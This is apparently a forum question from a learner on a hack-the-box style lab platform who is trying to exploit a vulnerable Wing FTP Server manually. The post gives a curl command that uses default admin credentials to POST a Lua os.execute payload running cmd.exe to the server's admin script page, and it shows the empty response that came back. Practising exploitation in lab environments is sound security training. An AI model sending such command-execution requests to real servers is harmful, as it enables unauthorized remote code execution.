I'm going through a hack-the-box type provider and they have a box that has a vulnerable copy of Wing FTP Server. It's easily exploitable using Metasploit: https://www.exploit-db.com/exploits/34517
However I would like to complete their 'extra mile' challenge by exploiting the service manually. I figured this could be done using curl. This is my attempt:
curl -i -s -k -u admin:admin -b 'UIDADMIN=adsfasdfasdfasdfasdfasdf' -X POST --data-binary $'command=os.execute(\'cmd.exe /c pwd\')' "http://10.1.1.1:5466/admin_lua_script.html"
Edit: All I ever get back is
HTTP/1.0 200 HTTP OK
Server: Wing FTP Server(Ferdi Bak)
Cache-Control: private
Content-Type: text/html
Content-Length: 0
Connection: close